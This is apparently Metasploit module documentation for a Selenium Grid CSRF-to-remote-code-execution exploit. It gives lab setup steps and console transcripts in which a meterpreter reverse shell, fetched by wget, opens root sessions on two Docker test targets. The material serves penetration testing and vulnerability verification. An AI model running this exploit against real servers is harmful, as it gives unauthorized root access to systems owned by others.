## Vulnerable Application

Selenium Server (Grid) before 4.0.0-alpha-7 allows CSRF because it permits non-JSON content types
such as application/x-www-form-urlencoded, multipart/form-data, and text/plain.

The vulnerability affects:

    * Selenium Server (Grid) before 4.0.0-alpha-7

This module was successfully tested on:

    * selenium/standalone-chrome:3.141.59 installed with Docker on Ubuntu 24.04
    * selenium/standalone-chrome:4.0.0-alpha-6-20200730 installed with Docker on Ubuntu 24.04


### Installation

1. `docker pull selenium/standalone-chrome:3.141.59`

2. `docker run -d -p 4444:4444 -p 7900:7900 --shm-size="2g" selenium/standalone-chrome:3.141.59`


## Verification Steps

1. Install the application
2. Start msfconsole
3. Do: `use exploit/linux/http/selenium_greed_chrome_rce_cve_2022_28108`
4. Do: `run lhost=<lhost> rhost=<rhost>`
5. You should get a meterpreter


## Options


## Scenarios
### selenium/standalone-chrome:3.141.59 installed with Docker on Ubuntu 24.04
```
msf > use exploit/linux/http/selenium_greed_chrome_rce_cve_2022_28108
[*] Using configured payload cmd/linux/http/x64/meterpreter_reverse_tcp
msf exploit(linux/http/selenium_greed_chrome_rce_cve_2022_28108) > options

Module options (exploit/linux/http/selenium_greed_chrome_rce_cve_2022_28108):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT    4444             yes       The target port (TCP)
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   VHOST                     no        HTTP server virtual host


Payload options (cmd/linux/http/x64/meterpreter_reverse_tcp):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   FETCH_COMMAND       WGET             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
   FETCH_DELETE        true             yes       Attempt to delete the binary after execution
   FETCH_FILENAME      OmbNmrIU         no        Name to use on remote system when storing payload; cannot contain spaces or slashes
   FETCH_SRVHOST                        no        Local IP to use for serving payload
   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
   FETCH_URIPATH                        no        Local URI to use for serving payload
   FETCH_WRITABLE_DIR                   yes       Remote writable dir to store payload; cannot contain spaces
   LHOST                                yes       The listen address (an interface may be specified)
   LPORT               4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Linux Command



View the full module info with the info, or info -d command.

msf exploit(linux/http/selenium_greed_chrome_rce_cve_2022_28108) > run lhost=192.168.56.1 rhost=192.168.56.16 rport=4444
[*] Started reverse TCP handler on 192.168.56.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Version 3.141.59 detected, which is vulnerable.
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.16:40990) at 2024-12-30 13:33:31 +0900

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : 172.17.0.5
OS           : Ubuntu 20.04 (Linux 6.8.0-51-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > 
```

### selenium/standalone-chrome:4.0.0-alpha-6-20200730 installed with Docker on Ubuntu 24.04
```
msf exploit(linux/http/selenium_greed_chrome_rce_cve_2022_28108) > run lhost=192.168.56.1 rhost=192.168.56.16 rport=4447
[*] Started reverse TCP handler on 192.168.56.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The service is running, but could not be validated. Selenium Grid version 4.x detected.
[*] Meterpreter session 2 opened (192.168.56.1:4444 -> 192.168.56.16:34888) at 2024-12-30 13:34:30 +0900

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : 172.17.0.6
OS           : Ubuntu 18.04 (Linux 6.8.0-51-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > 
```
